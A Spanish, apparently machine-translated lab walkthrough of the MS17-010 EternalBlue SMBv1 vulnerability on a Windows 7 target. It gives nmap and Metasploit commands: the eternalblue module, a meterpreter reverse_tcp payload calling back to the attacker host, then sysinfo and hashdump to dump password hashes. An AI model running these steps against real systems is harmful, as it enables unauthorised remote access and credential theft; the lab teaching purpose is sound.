Introducción a la vulnerabilidad
La vulnerabilidad MS17-010 aparece en la función de modo kernel srv! SrvOs2FeaListToNt en Windows SMB v1 cuando se procesa la conversión FEA (File Extended Attributes) y hay un desbordamiento de búfer en el grupo de kernel grande no paginado.
Se llamará a la función srv! SrvOs2FeaListToNt antes de convertir la lista FEA en lista NTFEA (Windows NT FEA). srv! SrvOs2FeaListSizeToNt para calcular el tamaño del lsit FEA convertido, el tamaño del cálculo es incorrecto, lo que provoca un desbordamiento del búfer.
entorno de laboratorio
Aquí uso el campo de tiro de Anjie.com
hora | 192.168.0.3 |
---|---|
Windows7 | 192.168.0.2 |
Explotar
Abra nmap para escanear la máquina de destino
nmap -sV -Pn 192.168.0.2
La máquina de destino ha abierto puertos como 135, 139, 445 y el sistema es win7.
Luego abrimos msf
msfconsole
Abra el cliente de línea de comandos de metasploite y use el comando de búsqueda para encontrar los módulos relacionados de las vulnerabilidades ms17-010
search ms17-010
Dado que esta es la ubicación de destino, podemos usarla directamente
use exploit/windows/smb/ms17_010_eternalblue
Ver la información de configuración y establecer los atributos marcados como sí
show options
Establecer la dirección IP de la máquina de destino
set RHOSTS 192.168.0.2
Después de eso, seleccione la carga útil, que es shellcode, aquí elegimos conectarnos de nuevo a la carga útil del shell de la consola
set payload windows/x64/meterpreter/reverse_tcp
De manera similar, la carga también debe configurarse, mostrar opciones ver información de
configuración Falta el host local LHOST, configúrelo
set LHOST 192.168.0.3
Después de completar la configuración, ejecute el exploit o ejecute para comenzar a ejecutar el módulo de exploit
run
Obtenga con éxito la sesión de sesión del host de destino
Hemos obtenido con éxito la sesión de sesión. Esta vez continuaremos introduciendo otras funciones del módulo de penetración después de meterpreter.
Ejecute sysinfo para ver información relevante de la máquina de destino.
sysinfo
Ejecutar el comando de ayuda puede ayudarnos a comprender qué funciones tiene meterpreter
help
A continuación, obtenemos el valor hash de la máquina objetivo y
ejecutamos hashdump
hashdump
para resumir
¡Otro día sencillo y satisfactorio!